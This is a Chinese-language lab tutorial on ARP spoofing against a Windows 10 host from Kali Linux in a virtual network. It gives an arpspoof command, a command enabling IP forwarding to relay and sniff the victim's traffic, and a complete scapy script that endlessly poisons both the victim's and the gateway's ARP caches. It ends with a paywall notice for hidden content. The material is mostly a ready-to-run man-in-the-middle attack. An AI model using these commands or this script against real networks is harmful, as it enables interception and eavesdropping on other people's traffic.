实验环境:
一台win10作为被攻击机
一台Linux作为攻击主机,确保两台主机都能上网,可以相互通信,两台主机都使用NAT模式
windows10被攻击主机:IP: 192.168.234.137 MAC: 00:0C:29:44:78:89
kali Linux攻击主机:IP: 192.168.234.139 MAC: 00:0c:29:13:99:f7
网关:IP:192.168.234.2 MAC: 00:50:56:f4:ff:98 (使用arp -a可查询)
1、对win10伪装,假装为网关的mac地址,此时win10无法上网
arpspoof -i eth0 -t 192.168.234.137 192.168.234.2
2、开启流量转发
echo 1 >> /proc/sys/net/ipv4/ip_forward
kali扮演网关,进行流量转发,在kali进行wireshark抓包可监听win10上网的流量
kaili不停向Windows10发送ARP回应包,告知windows10它是网关,从而Windows10访问互联网的流量就经由kali进行转发。
python代码实现arp欺骗
from scapy.all import *
from scapy.layers.l2 import ARP, Ether, getmacbyip
def arp_spoof():
iface="VMware Virtual Ethernet Adapter for VMnet8"
#被攻击主机
target_ip='192.168.234.137'
target_mac='00:0C:29:44:78:89'
#攻击主机
spoof_ip='192.168.234.139'
spoof_mac='00:0c:29:13:99:f7'
#真实网关
gateway_ip='192.168.234.2'
getway_mac=getmacbyip(gateway_ip)
#构造数据包
while True:
#欺骗被攻击主机:op=1:ARP请求 op=2:ARP响应
packet=Ether(src=spoof_mac,dst=target_mac)/ARP(hwsrc=spoof_mac,psrc=gateway_ip, hwdst=target_mac,pdst=target_ip,op=2)#响应的数据包op=2
sendp(packet,iface=iface)
#欺骗网关
packet = Ether(src=spoof_mac, dst=getway_mac) / ARP(hwsrc=spoof_mac, psrc=target_ip, hwdst=getway_mac,pdst=gateway_ip, op=2) # 响应的数据包op=2
sendp(packet, iface=iface)
if __name__ == '__main__':
arp_spoof()
本文含有隐藏内容,请 开通VIP 后查看